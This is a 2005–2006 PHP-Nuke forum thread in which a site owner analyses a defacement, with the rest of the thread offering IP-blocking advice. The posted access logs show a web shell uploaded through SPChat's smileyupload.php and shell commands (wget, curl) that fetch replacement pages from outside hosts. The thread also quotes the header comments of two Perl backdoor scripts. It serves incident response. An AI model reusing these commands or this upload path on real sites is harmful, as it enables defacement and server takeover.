| Author |
Message |
ring_c
Involved
Joined: Dec 28, 2003
Posts: 276
Location: Israel
|
 Posted:
Thu Sep 29, 2005 8:16 am |
|
Ok, this time they've realy made me angry! somone has reset my index.php. no other harm, just left me with a 0 bytes file!
Grrrrrrr... that realy got to me.
Ok, I've started investigating. Using Sentinel's (thanks guys, you're great!) tracked IP, I've found the hacker's ip, matching it to the time the file was last changed.
This is a Brasilian team. the IP was 200.232.181.49.
Ok. now I had to go through a 670mb raw log file, to find out what they've done! Geee... 670mb???
First of all, I went on a search for an editor which can handle this kind of size. have found one called Programmer's File Editor from 1999 (if you have a more recent one, tell me, though this one handle it pretty well).
Ok now... here's the log file, with all entries of this ip address (including another Brasilian IP i've found in the same time, just in case) :
Code:200.232.181.49 - - [28/Sep/2005:21:19:22 -0400] "GET /modules/drk.php HTTP/1.1" 404 4173 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:32 -0400] "POST /modules/SPChat/smileyupload.php HTTP/1.1" 200 1728 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:33 -0400] "GET /modules/inc.php HTTP/1.1" 200 2481 "http://www.hagigim.com/modules/SPChat/smileyupload.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:39 -0400] "GET /modules/inc.php HTTP/1.1" 200 4290 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:19:46 -0400] "POST /modules/inc.php HTTP/1.1" 200 5411 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:15 -0400] "POST /modules/inc.php HTTP/1.1" 200 4526 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:26 -0400] "GET / HTTP/1.1" 200 16172 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:26 -0400] "GET /themes/phpib2/style/style.css HTTP/1.1" 200 3184 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /images/banners/10%20facts%20of%20marriage.gif HTTP/1.1" 200 6527 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /themes/phpib2/images/head_bg.gif HTTP/1.1" 200 641 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /themes/phpib2/images/logo_original.jpg HTTP/1.1" 200 27299 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:27 -0400] "GET /themes/phpib2/images/cellpic1.gif HTTP/1.1" 200 99 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:28 -0400] "GET /themes/phpib2/images/7px.gif HTTP/1.1" 200 817 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:28 -0400] "GET /themes/phpib2/images/pixel.gif HTTP/1.1" 200 49 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /themes/phpib2/images/nav.gif HTTP/1.1" 200 828 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /themes/phpib2/images/cellpic3.gif HTTP/1.1" 200 101 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /images/calender.jpg HTTP/1.1" 200 482 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:29 -0400] "GET /images/rss.gif HTTP/1.1" 200 728 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /modules/Forums/images/avatars/blank.gif HTTP/1.1" 200 7639 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/ball_r.gif HTTP/1.1" 200 191 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/ball_g.gif HTTP/1.1" 200 193 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/group.gif HTTP/1.1" 200 989 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:30 -0400] "GET /images/blocks/guest.gif HTTP/1.1" 200 889 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/spacer.gif HTTP/1.1" 200 89 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/space.gif HTTP/1.1" 200 91 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/userprofil.gif HTTP/1.1" 200 891 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:31 -0400] "GET /images/blocks/member.gif HTTP/1.1" 200 887 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/blocks/admin.gif HTTP/1.1" 200 886 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/blocks/gold.gif HTTP/1.1" 200 894 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/topics/dati.gif HTTP/1.1" 200 3533 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:32 -0400] "GET /images/topics/hagigim.gif HTTP/1.1" 200 3713 "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:37 -0400] "GET /modules/inc.php?work_dir=/&command=wget+200.141.152.173%2Findex.php HTTP/1.1" 200 1786 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:43 -0400] "POST /modules/inc.php HTTP/1.1" 200 1349 "http://www.hagigim.com/modules/inc.php?work_dir=/&command=wget+200.141.152.173%2Findex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:47 -0400] "POST /modules/inc.php HTTP/1.1" 200 151780 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:50 -0400] "POST /modules/inc.php HTTP/1.1" 200 1458 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:20:57 -0400] "POST /modules/inc.php HTTP/1.1" 200 1400 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:03 -0400] "POST /modules/inc.php HTTP/1.1" 200 1419 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:20 -0400] "POST /modules/inc.php HTTP/1.1" 200 1503 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:24 -0400] "POST /modules/inc.php HTTP/1.1" 200 152709 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:26 -0400] "POST /modules/inc.php HTTP/1.1" 200 1386 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:48 -0400] "POST /modules/inc.php HTTP/1.1" 200 4621 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:21:53 -0400] "POST /modules/inc.php HTTP/1.1" 200 4677 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:23 -0400] "GET / HTTP/1.1" 200 15983 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/images/logo_original.jpg HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/style/style.css HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /images/banners/10%20facts%20of%20marriage.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/images/cellpic1.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:24 -0400] "GET /themes/phpib2/images/head_bg.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/7px.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/pixel.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/nav.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /themes/phpib2/images/cellpic3.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /images/calender.jpg HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:25 -0400] "GET /images/rss.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:26 -0400] "GET /modules/Forums/images/avatars/blank.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:26 -0400] "GET /images/blocks/ball_g.gif HTTP/1.1" 304 - "http://www.hagigim.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:39 -0400] "POST /modules/inc.php HTTP/1.1" 200 4567 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:22:45 -0400] "GET / HTTP/1.1" 200 30 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:23:25 -0400] "POST /modules/inc.php HTTP/1.1" 200 4755 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:23:29 -0400] "GET / HTTP/1.1" 200 1232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:26:10 -0400] "GET / HTTP/1.1" 200 1232 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:39 -0400] "POST /modules/inc.php HTTP/1.1" 200 4699 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:41 -0400] "POST /modules/inc.php HTTP/1.1" 200 4734 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:52 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:55 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:28:56 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:06 -0400] "POST /modules/inc.php HTTP/1.1" 200 4741 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:14 -0400] "POST /modules/inc.php HTTP/1.1" 200 4626 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:18 -0400] "POST /modules/inc.php HTTP/1.1" 200 4633 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:29:23 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.233.139.36 - - [28/Sep/2005:21:31:56 -0400] "GET /modules/inc.php HTTP/1.1" 200 4304 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:31:57 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:03 -0400] "POST /modules/inc.php HTTP/1.1" 200 4555 "http://www.hagigim.com/modules/inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:04 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:08 -0400] "POST /modules/inc.php HTTP/1.1" 200 4940 "http://www.hagigim.com/modules/inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:08 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:12 -0400] "POST /modules/inc.php HTTP/1.1" 200 4838 "http://www.hagigim.com/modules/inc.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:21:32:13 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.232.181.49 - - [28/Sep/2005:21:40:35 -0400] "POST /modules/SPChat/smileyupload.php HTTP/1.1" 200 1728 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:35 -0400] "GET /modules/inc.php HTTP/1.1" 200 4199 "http://www.hagigim.com/modules/SPChat/smileyupload.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:46 -0400] "GET /modules/inc.php HTTP/1.1" 200 4192 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:48 -0400] "GET /modules/inc.php?work_dir=/&command= HTTP/1.1" 200 1709 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:50 -0400] "POST /modules/inc.php HTTP/1.1" 200 1861 "http://www.hagigim.com/modules/inc.php?work_dir=/&command=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:40:58 -0400] "GET / HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:41:10 -0400] "POST /modules/inc.php HTTP/1.1" 200 1857 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:41:18 -0400] "GET /modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php HTTP/1.1" 200 1892 "http://www.hagigim.com/modules/inc.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.232.181.49 - - [28/Sep/2005:21:41:21 -0400] "GET /modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php HTTP/1.1" 200 1850 "http://www.hagigim.com/modules/inc.php?work_dir=/&command=curl+-O+geocities.yahoo.com.br%2Fsufurick%2Findex.php+%3Eindex.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.233.139.36 - - [28/Sep/2005:23:04:15 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.233.139.36 - - [28/Sep/2005:23:04:18 -0400] "GET /favicon.ico HTTP/1.1" 404 4173 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
|
You can see they've used some backdoor in SPChat, which let you UL files. The filename is smileyupload.php, and it can be found in \modules\SPChat\
Also, I've found to .txt files in my root ULed today, which looks like perl hacking script.
Here's the one called dc.txt:
Code:#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
print "[*] Datached\n\n";
|
And here's the one called own.txt:
Code:#!/usr/bin/perl
# Telnet-like Standard Daemon 0.7
#
# 0ldW0lf - [ Only registered users can see links on this board! Get registered or login! ]
# - [ Only registered users can see links on this board! Get registered or login! ]
# - [ Only registered users can see links on this board! Get registered or login! ]
# - [ Only registered users can see links on this board! Get registered or login! ]
#
# For those guys that still like to open ports
# and use non-rooted boxes
#
# This has been developed to join in the TocToc
# project code, now it's done and I'm distributing
# this separated
#
# This one i made without IO::Pty so it uses
# only standard modules... enjoy it
#
# tested on linux boxes.. probably will work fine on others
# any problem... #atrix@irc.brasnet.org
#
|
Now, first I think it should be recommended to remove SPChat's smileyupload.php file. Then, regarding the other files and log -> it's beyond my capabilities. Maybe you guys can figure something out of this.
FYI.
Edited by Raven for security reasons |
| |
|
 
|
|
hitwalker
Sells PC To Pay For Divorce
Joined:
Posts: 5661
|
| Posted:
Thu Sep 29, 2005 8:40 am |
|
nice such a fat log..
anyway....
spchat does have a few vulnerabilities.
[ Only registered users can see links on this board! Get registered or login! ]
And that was a simple search..
You shouldnt leave any "upload capable" files on your server..
However i do have doubts they did this..
Cause you do must have some rights or access to do any damage..
And using search like "vulnerabilities SPChat" gives 1800 results in that.
Nice chat..  |
| |
|
|
|
|
ring_c
|
| Posted:
Thu Sep 29, 2005 8:49 am |
|
Gees... would you suggest completely removing SPChat? |
| |
|
|
|
|
hitwalker
|
| Posted:
Thu Sep 29, 2005 2:15 pm |
|
well lets not debate if spchat is vulnerable or not.
you do believe someone abused spchat.
there are other chat scripts out there you can use. |
| |
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Thu Sep 29, 2005 3:49 pm |
|
deny from 200.0.0.0/10
That will deny from 200.0.0.0 - 200.63.255.255
I receive over 3 million bytes per day from that IP range that drops into the bit-bucket. Of course I drop it at the kernel level so it never goes anywhere - it doesn't affect the web server that way 
If you have access to your root access on your server and use APF, just use this commandCode:/PATH/TO/APF/apf -d 200.0.0.0/10 #brazil kiddies
|
If you don't use APF but have IPTABLES installed, useCode:iptables -I INPUT -s 200.0.0.0/10 -j DROP
|
|
| |
|
|
|
|
ring_c
|
| Posted:
Sat Oct 01, 2005 12:39 pm |
|
Thanks, Raven, but I do not have access to my server's root, so I've tried using your deny line in my .htaccess. Actually, I tried posting it here so I could get your confirmation, but I was banned somewhy by sentinel, and I don't want to be rebanned, so i'll have to trust my instincts. |
| |
|
|
|
|
Susann
Moderator
Joined: Dec 19, 2004
Posts: 3191
Location: Germany:Moderator German NukeSentinel Support
|
| Posted:
Sat Oct 01, 2005 1:00 pm |
|
 I have also tried to post my htaccess some days before.
Your instinct is probably better then mine with other words prevention is better than cure. But deny is easy its only one line. |
| |
|
|
|
|
Raven
|
| Posted:
Sat Oct 01, 2005 1:05 pm |
|
| ring_c wrote: | | Thanks, Raven, but I do not have access to my server's root, so I've tried using your deny line in my .htaccess. Actually, I tried posting it here so I could get your confirmation, but I was banned somewhy by sentinel, and I don't want to be rebanned, so i'll have to trust my instincts. |
That will handle it. |
| |
|
|
|
|
ring_c
|
| Posted:
Sat Oct 01, 2005 1:36 pm |
|
Raven, that's a part of my .htaccess:
<Limit GET PUT POST>
Order Allow,Deny
deny from 200.0.0.0/10
Allow from all
</Limit>
is that ok? |
| |
|
|
|
|
Susann
|
| Posted:
Sat Oct 01, 2005 1:45 pm |
|
Your htaccess is OK For example thats my part of this.
<Limit GET PUT POST>
Order Allow,Deny
Deny from 217.67.244.02
Deny from 211.157.8.41
Allow from all
</Limit>
Btw. Have you ever heard of grep. Its a tool for logfiles analyze.I got this tip from my other forum. Maybe its interesting for you too. But I have not checked it. |
| |
|
|
|
|
ring_c
|
| Posted:
Sat Oct 01, 2005 1:56 pm |
|
I've just googled it and found it to be some unix/linux tool.
Will it handle large log files like mine (over 500mb)?
Also, the reason my logfile is so long, is that I have Site Messenger, which refreshes itself for new messages every 2000ms or so. is there a way to make it not being recorded? |
| |
|
|
|
|
Raven
|
| Posted:
Sat Oct 01, 2005 1:57 pm |
|
grep is standard unix from way back. You have to be logged into your server via ssh to use it. |
| |
|
|
|
|
JediAaron
New Member
Joined: Apr 12, 2006
Posts: 11
|
| Posted:
Tue Jul 11, 2006 8:09 am |
|
This is an old thread - but I'm wondering if this still an issue with the latest SPChat, and is there anything in RavenPHP (Nuke Sentinel) I need or should do?
Thanks |
_________________
- Dravin
[ Only registered users can see links on this board! Get registered or login! ] |
|
 
|
|
Guardian2003
Site Admin
Joined: Aug 28, 2003
Posts: 6799
Location: Ha Noi, Viet Nam
|
| Posted:
Tue Jul 11, 2006 9:47 am |
|
I thought everyone was aware of the SPChat problem 
Perhaps it is time for an authoritative list of known vulnerable modules and othe add-ons/hacks? |
| |
|
|
|
|
JediAaron
|
| Posted:
Tue Jul 11, 2006 9:59 am |
|
Well I knew it had issues, what doesn't these days (other than Raven? :p).
The people at the site wanted to chit-chat, its the best program I could find. But I was wondering, what the best steps are the protect myself. I see Raven posted a reply above - didn't know if there was something via Sentinel I could do.
 |
| |
|
|
|
|
Guardian2003
|
| Posted:
Tue Jul 11, 2006 10:02 am |
|
As Raven posted, you could add the following range to Nuke Sentinels blocked ranges
200.0.0.0 to 200.63.255.255
But you can always use htaccess which will prevent them even reaching the site. |
Last edited by Guardian2003 on Tue Jul 11, 2006 10:07 am; edited 1 time in total |
|
|
|
|
JediAaron
|
| Posted:
Tue Jul 11, 2006 10:05 am |
|
| Guardian2003 wrote: | As Raven posted, you could add the folling range to Nuke Sentinels blocked ranges
200.0.0.0 to 200.63.255.255 |
Thank you kind sir. Just wanted to double check
It is done.  |
| |
|
|
|
|
Gremmie
Former Moderator in Good Standing
Joined: Apr 06, 2006
Posts: 2415
Location: Iowa, USA
|
| Posted:
Tue Jul 11, 2006 12:07 pm |
|
| JediAaron wrote: | | The people at the site wanted to chit-chat, its the best program I could find. |
Did you look at php121? |
| |
|
|
|
|
montego
Site Admin
Joined: Aug 29, 2004
Posts: 9457
Location: Arizona
|
| Posted:
Wed Jul 12, 2006 6:31 am |
|
JediAaron, but please understand that if SPChat is vulnerable, banning IP addresses does not solve the problem, only eliminates the few folks who were doing the backing earlier from accessing your site.
Just did not want you to feel overly confident and get hacked. Nuke, or any other system, is only as good as its "weakest link".
Unfortunately, I cannot comment on chat programs as I do not have time to review them for security holes and I'd probably miss them anyways. Just saying this to "be careful" and make a truelly educated, well-considered decision. |
_________________
Where Do YOU Stand?
HTML Newsletter::ShortLinks::Mailer::Downloads and more... |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
